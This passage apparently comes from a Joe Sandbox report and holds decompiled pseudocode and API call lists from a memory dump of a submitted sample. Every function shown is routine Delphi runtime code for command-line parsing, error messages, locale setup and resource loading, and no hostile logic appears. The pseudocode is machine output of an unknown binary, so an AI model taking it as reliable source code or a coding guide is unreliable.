    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}


































    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
